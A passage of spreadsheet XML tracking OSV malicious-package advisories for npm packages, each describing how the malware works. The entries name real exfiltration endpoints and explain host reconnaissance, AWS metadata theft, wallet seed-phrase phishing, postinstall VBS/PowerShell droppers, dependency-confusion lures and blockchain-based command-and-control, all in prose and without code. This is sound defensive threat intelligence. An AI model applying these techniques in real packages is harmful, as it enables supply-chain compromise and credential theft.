          <t>MAL-2026-17514</t>
        </is>
      </c>
      <c r="D171" s="5" t="inlineStr"/>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="inlineStr"/>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>npm:minimal-a11y-contrast-check</t>
        </is>
      </c>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr"/>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d9a198e6fb2c5e31bc841ff12f210e630abe8629853faf4ea961a124a9be8a25)
Despite being advertised as a WCAG contrast checker, the package executes a self-invoking function at module load that runs host reconnaissance commands (whoami, id, hostname, uname -a, ls -la /, pwd, cat /etc/os-release) and collects filtered environment variables, then exfiltrates the results via DNS subdomain requests to davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live and HTTP GET parameters to webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The exfiltration fires on any import of the package. Additionally, the module exports factories named after Wix Thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry) and ships a registry-manifest.min.json pointing at static.parastorage.com/unpkg/minimal-a11y-contrast-check@1.0.0, impersonating internal Wix build infrastructure to be resolved via dependency confusion. A hardcoded 'internetbrands' tag embedded in the exfiltration payload indicates targeted reconnaissance.
</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17514</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17515</t>
        </is>
      </c>
      <c r="D172" s="5" t="inlineStr"/>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="inlineStr"/>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr">
        <is>
          <t>npm:monitoring-agent</t>
        </is>
      </c>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr"/>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (703c1e796904571c9f0d08a4769a5f7e25a646483b4a66815a6ddc420ae0ecee)
The package exports an Express middleware (`monitor()`) advertised as a monitoring tool. On every response finish, the middleware POSTs the inbound HTTP request to a hardcoded author-controlled host at https://backend-cybersecuritydashboard.onrender.com/api/events. The payload explicitly extracts `req.body.password`, `req.body.username`, and `req.body.email` as dedicated fields alongside the full request headers, body, query string, and route params. The destination URL is not configurable by the caller — the only caller-supplied value is an apiKey. Any Express application that mounts this middleware will silently forward its end users' plaintext credentials and complete request payloads to this third-party Render host on every request. The package.json uses placeholder author metadata (`Your Name`) with no repository or homepage, and the exfiltration destination is unrelated to any disclosed publisher.
</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17515</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17516</t>
        </is>
      </c>
      <c r="D173" s="5" t="inlineStr"/>
      <c r="E173" s="5" t="inlineStr"/>
      <c r="F173" s="5" t="inlineStr"/>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>npm:oleh-modal</t>
        </is>
      </c>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr"/>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cf2aebc282014a7dfa6ef1726083d23bcc9cc3eca76c814d4e775b7b10021545)
Package oleh-modal@1.0.0 is a credential-harvesting phishing kit disguised as a wallet-connect modal component. It renders fake MetaMask/Phantom/Rabby/OKX 'restore vault' modals that link to the legitimate extensions' restore-vault URLs to reinforce the deception, then captures the user's typed seed phrase / password characters via sendKeyToBackendAPI and POSTs them to a hardcoded backend at https://api.wagmiwallet.org/api/keys along with wallet_type, user_id, and enriched geolocation metadata (IP via api.ipify.org, city/region/country via ipapi.co). A persistent WebSocket connection to wss://api.wagmiwallet.org subscribes to a 'showMacModal' event that lets a remote operator trigger a spoofed macOS admin-authentication prompt on demand in the host application; captured mac_user_name and keystrokes from that dialog are forwarded through the same exfiltration path. Configuration references serverUrl 'https://wagmirequest.la' and backendUrl 'https://api.wagmiwallet.org', typosquats of wagmi.sh. Any consumer application that renders this component will forward its end users' wallet mnemonics and OS credentials to the attacker endpoint.
</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17516</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17517</t>
        </is>
      </c>
      <c r="D174" s="5" t="inlineStr"/>
      <c r="E174" s="5" t="inlineStr"/>
      <c r="F174" s="5" t="inlineStr"/>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>npm:popover-anchor-polyfill</t>
        </is>
      </c>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr"/>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (31e270ae326e5c45ebeb5fcf7bc9ff96126908c194bef5f280a4028fff0e9ed9)
The package advertises itself as a 'popover anchor positioning polyfill' but ships thunderboltRegistry.js, which executes an IIFE on module load that spawns shell commands via child_process.execSync (`id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`) and reads `/etc/hosts`, then transmits each command's output together with hostname, Node version, platform, and pid over plain HTTP GET requests to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The require path uses cache-bypass tricks (deleting require.cache entries matching 'thunderboltRegistry' and manually constructing a fresh Module to re-resolve child_process) to defeat mocking or interception. Sibling stub files and a `registry-manifest.min.json` impersonate Wix thunderbolt internal registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) and reference static.parastorage.com, indicating a dependency-confusion lure targeting Wix build pipelines. The declared polyfill purpose does not match the shipped Wix-internal namespace exports, and no popover-polyfill functionality is implemented.
</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17517</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17518</t>
        </is>
      </c>
      <c r="D175" s="5" t="inlineStr"/>
      <c r="E175" s="5" t="inlineStr"/>
      <c r="F175" s="5" t="inlineStr"/>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>npm:postcss-gap-fallback-util</t>
        </is>
      </c>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr"/>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5b54d5bd893bc377a77503059998e01ae3e338fd4d8ddac6fe2d7c71a3157cb5)
The package is published as a PostCSS gap fallback utility but ships thunderboltRegistry.js, which executes an IIFE on module load. The IIFE runs whoami, id, and hostname via child_process.execSync, curls the AWS instance metadata service at http://169.254.169.254/latest/meta-data/ for IAM role, instance-id, availability zone, and local IPv4, and sends the results to https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba along with DNS beacons to a host under oast.live. A registry-manifest.min.json maps multiple Wix-internal registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry) to the same exfiltration file, and the module exports a Proxy returning no-op registry methods as a façade. The naming, manifest, and façade indicate a dependency-confusion payload targeting Wix build infrastructure; on any installer that requires one of the impersonated module names, shell identity, hostname, and (on EC2) AWS IAM role credentials/metadata are leaked to an attacker-controlled webhook and DNS collector.
</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17518</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17519</t>
        </is>
      </c>
      <c r="D176" s="5" t="inlineStr"/>
      <c r="E176" s="5" t="inlineStr"/>
      <c r="F176" s="5" t="inlineStr"/>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>npm:promises-dotenv3</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr"/>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (146d9688d00e8fa785e2fb62976f0dad169e8055c6c92d3795536cc63527c640)
promises-dotenv3@1.0.0 is a typosquat of dotenv-family packages that executes an obfuscated payload at module load. On top-level require of the package's main entry and its CLI, a function named `dispatchAnalytics` reads a payload hidden in an APP13 JFIF segment of a bundled image (dist/stest.jpg), writes a randomly-named VBS file (relay_*.vbs) to the OS temp directory, and spawns wscript.exe (detached) to invoke powershell.exe with -NoProfile -NonInteractive -EncodedCommand and the extracted content; the VBS self-deletes after launch. The interpreter names and PowerShell switches are assembled from joined string fragments ("power"+"shell"+".exe", "wscript"+".exe", split -No/Profile, -Non/Interactive, -Encoded/Command) to evade static string matching. The bundled package.json inside dist/cli.cjs identifies itself as `node-env-buffer` v2.2.6, indicating the same payload is being published under multiple dotenv-adjacent names. Installing or requiring this package runs attacker-controlled PowerShell on the installer's Windows host.
</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17519</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17520</t>
        </is>
      </c>
      <c r="D177" s="5" t="inlineStr"/>
      <c r="E177" s="5" t="inlineStr"/>
      <c r="F177" s="5" t="inlineStr"/>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>npm:rgx33-css-grid-utils</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr"/>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (320488b79c9000782e398425aa1a2fddba7f29a487913bbb2fc2019405c078f5)
The package is published as `rgx33-css-grid-utils` but exports a set of module keys matching Wix thunderbolt internal registries (`thunderboltRegistry`, `siteAssetsRegistry`, `editorRegistry`, `corvidRegistry`, `dataBindingRegistry`, `documentManagementRegistry`, and others) — a dependency-confusion lure targeting Wix's internal build/runtime namespace. On module load, an IIFE collects host identifiers (hostname, pid, Node version, platform) and runs `child_process.execSync('id')` and `child_process.execSync('uname -r')` to capture the current user and kernel version. These values are encoded as DNS subdomain labels and sent via `fetch` to the interactsh/OOB collector `davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live`, and in parallel to `https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba` with a `where=wix-blog` query parameter identifying the campaign target. The package ships no CSS grid functionality consistent with its name; the reconnaissance beacon is the entire payload.
</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17520</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17521</t>
        </is>
      </c>
      <c r="D178" s="5" t="inlineStr"/>
      <c r="E178" s="5" t="inlineStr"/>
      <c r="F178" s="5" t="inlineStr"/>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>npm:rgx33-flex-layout-core</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr"/>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02200327d66cf0661b787f58049b55b5fbb95dfb76fbb81a679cc71439bd85eb)
Package name and exports (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) impersonate internal Wix thunderbolt registry packages, targeting Wix build pipelines via dependency confusion. On require, thunderboltRegistry.js executes `id` and `uname -r` via child_process.execSync and collects hostname, pid, Node.js version, and platform. These values are encoded into subdomains of an attacker-controlled Interactsh/OAST callback domain (davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live) and also POSTed to a webhook.site collector (webhook.site/0492a36c-4d7b-408a-865c-226db25987ba). The exfiltration behavior has no relation to the package's advertised 'flexbox layout utilities' purpose, and the manifest references to static.parastorage.com paths reinforce the Wix-targeted dependency-confusion shape.
</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17521</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17522</t>
        </is>
      </c>
      <c r="D179" s="5" t="inlineStr"/>
      <c r="E179" s="5" t="inlineStr"/>
      <c r="F179" s="5" t="inlineStr"/>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>npm:studiocode_eligibility</t>
        </is>
      </c>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr"/>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a49b1af8bbf0463bb38d3049e59c28b0dcc8d2e3e5ef54611b4e77bddfdd36dc)
package.json declares a postinstall hook `wscript.exe 4444.vbs` that automatically executes a 765KB VBScript shipped in the tarball on Windows installers. The VBS contains multi-layer obfuscation (XOR-decoded AES S-boxes, SHA-256 constants, a ChaCha20 stream layer, and a large Base64 'ArtifactBundleHX' blob) that decrypts a PowerShell loader, writes it to %TEMP%\pf#####.dat, and invokes it via powershell.exe using process-hollowing-style techniques. The library source (src/index.js) is a small Zod-based email-domain eligibility checker that is unrelated to the VBS payload and serves as cover. The README explicitly claims 'Checks run locally, without network requests' and 'There are no installation scripts', directly contradicting the declared postinstall hook and shipped dropper. Running `npm install studiocode_eligibility` on Windows grants the package author arbitrary code execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17522</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17523</t>
        </is>
      </c>
      <c r="D180" s="5" t="inlineStr"/>
      <c r="E180" s="5" t="inlineStr"/>
      <c r="F180" s="5" t="inlineStr"/>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>npm:studiocode_tools</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr"/>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (261d413c0847b530c9a452c209c25e0a7d9123f9b0f20b26d0afcc41a929c74a)
package.json declares a postinstall hook that runs `wscript.exe 4444.vbs`, auto-executing on `npm install` on Windows. The shipped 4444.vbs contains hand-rolled AES and ChaCha20 implementations with XOR-obfuscated S-boxes, SHA-256 round constants XORed with 0x5A5A5A5A, and hundreds of base64 ciphertext fragments (`ArtifactBundleHX`) that are reassembled and decrypted at runtime into a PowerShell loader. The script writes a payload file to `%TEMP%\pfNNNNN.dat` and invokes `powershell.exe` to perform process hollowing of the decrypted payload. The VBS carries cover-story branding as 'Verdant Signals Corp' / 'Device Telemetry Aggregator', and the README falsely states 'There are no installation scripts.' The multi-layer custom cryptography, false branding, and explicit README denial of install scripts are unambiguous indicators of hostile intent rather than legitimate functionality.
</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17523</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17524</t>
        </is>
      </c>
      <c r="D181" s="5" t="inlineStr"/>
      <c r="E181" s="5" t="inlineStr"/>
      <c r="F181" s="5" t="inlineStr"/>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-forms-styles</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr"/>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (587d9a389f35a8ec2d3ed714c90f7daa43feb6875f4ce2e4280f5ce19569d895)
The package name tailwindcss-forms-styles mimics the legitimate @tailwindcss/forms plugin, and its src/index.js copies that plugin's code verbatim as cover. Above the cover code, a top-level IIFE joins a ~140-element base64 string array, atob()-decodes it, and eval()s the result. The decoded loader queries public Ethereum RPC/Blockscout endpoints for the most recent transaction sent by hardcoded address 0xa322E5f3D311D3080e6f0121063e9aDC2490Ef1a, parses two IPv4 addresses out of the transaction recipient field, downloads an XOR-encoded JavaScript payload from staging URLs of the form http://&lt;ip&gt;:443/0x/cls and http://&lt;ip&gt;:443/0x/ls, and executes it via eval and a detached spawn('node', ['-e',...]) child process. Because the IIFE runs at module load, any consumer that performs require('tailwindcss-forms-styles') triggers remote code execution on the installer, with the command-and-control endpoint resolved dynamically from the blockchain so the C2 can be rotated without changing the package.
</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17524</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17525</t>
        </is>
      </c>
      <c r="D182" s="5" t="inlineStr"/>
      <c r="E182" s="5" t="inlineStr"/>
      <c r="F182" s="5" t="inlineStr"/>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-css-token-parser</t>
        </is>
      </c>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr"/>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee63fae51fceee7c4d3c5051e191e477ca9bb8302f6fc4d3d07f5446951efa0f)
Package is advertised as a CSS token parser but ships thunderboltRegistry.js which runs an IIFE on module load that collects hostname, pid, Node version, platform, and the output of `id` and `uname -r` via child_process.execSync, then exfiltrates them as DNS/HTTP subdomains under an oast.live interact.sh collector and a POST to webhook.site/0492a36c-4d7b-408a-865c-226db25987ba with a `where=internetbrands` tag. The package manifest aliases seven internal Wix Thunderbolt registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) to the same recon module and exports factories under those keys, so any loader that resolves those internal names to this public package will execute the recon payload. The name/description are a cover story; the actual behavior is targeted dependency-confusion reconnaissance against Wix's internetbrands build graph.
</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17525</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17526</t>
        </is>
      </c>
      <c r="D183" s="5" t="inlineStr"/>
      <c r="E183" s="5" t="inlineStr"/>
      <c r="F183" s="5" t="inlineStr"/>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-dom-focus-trap</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr"/>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (84262096595a1e0ce09bbaa359930cd07cf420cc72545174ddc4f12c60bec962)
